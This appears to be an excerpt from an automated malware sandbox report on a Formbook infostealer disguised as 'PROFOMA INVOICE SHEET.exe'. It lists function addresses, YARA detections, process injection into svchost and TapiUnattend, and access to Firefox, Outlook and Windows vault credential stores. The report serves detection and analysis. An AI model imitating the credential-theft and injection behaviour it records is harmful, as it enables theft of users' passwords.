            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0332E3F06_2_0332E3F0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033E03E66_2_033E03E6
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033C02746_2_033C0274
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033A02C06_2_033A02C0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033BA1186_2_033BA118
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033101006_2_03310100
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033A81586_2_033A8158
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033E01AA6_2_033E01AA
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033D41A26_2_033D41A2
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033D81CC6_2_033D81CC
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033B20006_2_033B2000
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033207706_2_03320770
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033447506_2_03344750
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0331C7C06_2_0331C7C0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0333C6E06_2_0333C6E0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033205356_2_03320535
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033E05916_2_033E0591
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033C44206_2_033C4420
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033D24466_2_033D2446
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033CE4F66_2_033CE4F6
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033DAB406_2_033DAB40
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033D6BD76_2_033D6BD7
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0331EA806_2_0331EA80
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033369626_2_03336962
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033229A06_2_033229A0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033EA9A66_2_033EA9A6
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033228406_2_03322840
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0332A8406_2_0332A840
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033068B86_2_033068B8
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0334E8F06_2_0334E8F0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03340F306_2_03340F30
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033C2F306_2_033C2F30
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03362F286_2_03362F28
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03394F406_2_03394F40
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0339EFA06_2_0339EFA0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03312FC86_2_03312FC8
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033DEE266_2_033DEE26
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03320E596_2_03320E59
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03332E906_2_03332E90
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033DCE936_2_033DCE93
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033DEEDB6_2_033DEEDB
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033BCD1F6_2_033BCD1F
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0332AD006_2_0332AD00
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03338DBF6_2_03338DBF
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0331ADE06_2_0331ADE0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03320C006_2_03320C00
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033C0CB56_2_033C0CB5
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03310CF26_2_03310CF2
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033D132D6_2_033D132D
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0330D34C6_2_0330D34C
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0336739A6_2_0336739A
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033252A06_2_033252A0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0333D2F06_2_0333D2F0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033C12ED6_2_033C12ED
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0333B2C06_2_0333B2C0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0330F1726_2_0330F172
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033EB16B6_2_033EB16B
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0335516C6_2_0335516C
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0332B1B06_2_0332B1B0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033D70E96_2_033D70E9
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033DF0E06_2_033DF0E0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033CF0CC6_2_033CF0CC
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033270C06_2_033270C0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033DF7B06_2_033DF7B0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033656306_2_03365630
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033D16CC6_2_033D16CC
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033D75716_2_033D7571
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033BD5B06_2_033BD5B0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033DF43F6_2_033DF43F
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033114606_2_03311460
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033DFB766_2_033DFB76
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0333FB806_2_0333FB80
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03395BF06_2_03395BF0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0335DBF96_2_0335DBF9
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03393A6C6_2_03393A6C
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033DFA496_2_033DFA49
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033D7A466_2_033D7A46
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03365AA06_2_03365AA0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033BDAAC6_2_033BDAAC
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033C1AA36_2_033C1AA3
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033CDAC66_2_033CDAC6
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033B59106_2_033B5910
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033299506_2_03329950
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0333B9506_2_0333B950
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0338D8006_2_0338D800
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033238E06_2_033238E0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033DFF096_2_033DFF09
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033DFFB16_2_033DFFB1
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03321F926_2_03321F92
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03329EB06_2_03329EB0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033D7D736_2_033D7D73
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033D1D5A6_2_033D1D5A
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03323D406_2_03323D40
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0333FDC06_2_0333FDC0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_03399C326_2_03399C32
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_033DFCF26_2_033DFCF2
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_028F1CD06_2_028F1CD0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_028ECBD06_2_028ECBD0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_028EAE706_2_028EAE70
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_028ECDF06_2_028ECDF0
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_028F53906_2_028F5390
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_028F35806_2_028F3580
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_028F357B6_2_028F357B
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0290BA906_2_0290BA90
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0311E3366_2_0311E336
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0311E7ED6_2_0311E7ED
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0311E4536_2_0311E453
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0311CA6F6_2_0311CA6F
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0311CAE86_2_0311CAE8
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0311D8236_2_0311D823
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: 6_2_0311D8586_2_0311D858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 99 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 103 times
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: String function: 00320A30 appears 46 times
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: String function: 0031F9F2 appears 31 times
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: String function: 0330B970 appears 262 times
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: String function: 0338EA12 appears 85 times
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: String function: 03355130 appears 58 times
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: String function: 03367E54 appears 107 times
            Source: C:\Windows\SysWOW64\TapiUnattend.exeCode function: String function: 0339F290 appears 103 times
            Source: PROFOMA INVOICE SHEET.exe, 00000000.00000003.1700161234.0000000003B33000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PROFOMA INVOICE SHEET.exe
            Source: PROFOMA INVOICE SHEET.exe, 00000000.00000003.1702033094.000000000489D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PROFOMA INVOICE SHEET.exe
            Source: PROFOMA INVOICE SHEET.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4150699714.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4149551530.00000000028E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2118026660.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4150549424.00000000039C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.2118406683.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@14/7
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003737B5 GetLastError,FormatMessageW,0_2_003737B5
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003610BF AdjustTokenPrivileges,CloseHandle,0_2_003610BF
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003616C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003616C3
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003751CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_003751CD
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0038A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0038A67C
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_0037648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0037648E
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeCode function: 0_2_003042A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_003042A2
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeFile created: C:\Users\user\AppData\Local\Temp\undiscerniblyJump to behavior
            Source: PROFOMA INVOICE SHEET.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: TapiUnattend.exe, 00000006.00000002.4149956479.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4149956479.0000000002EDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PROFOMA INVOICE SHEET.exeReversingLabs: Detection: 50%
            Source: PROFOMA INVOICE SHEET.exeVirustotal: Detection: 25%
            Source: unknownProcess created: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe"
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe"
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeProcess created: C:\Windows\SysWOW64\TapiUnattend.exe "C:\Windows\SysWOW64\TapiUnattend.exe"
            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe"Jump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeProcess created: C:\Windows\SysWOW64\TapiUnattend.exe "C:\Windows\SysWOW64\TapiUnattend.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\TapiUnattend.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PROFOMA INVOICE SHEET.exeStatic file information: File size 1722368 > 1048576
            Source: PROFOMA INVOICE SHEET.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: PROFOMA INVOICE SHEET.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: PROFOMA INVOICE SHEET.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: PROFOMA INVOICE SHEET.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: PROFOMA INVOICE SHEET.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: PROFOMA INVOICE SHEET.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: PROFOMA INVOICE SHEET.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: TapiUnattend.pdbGCTL source: svchost.exe, 00000001.00000002.2117869256.0000000003619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2117847522.0000000003600000.00000004.00000020.00020000.00000000.sdmp, bJWYsPIiPtg.exe, 00000005.00000002.4150058173.0000000000747000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bJWYsPIiPtg.exe, 00000005.00000002.4149955511.00000000006DE000.00000002.00000001.01000000.00000005.sdmp, bJWYsPIiPtg.exe, 00000007.00000000.2210396231.00000000006DE000.00000002.00000001.01000000.00000005.sdmp
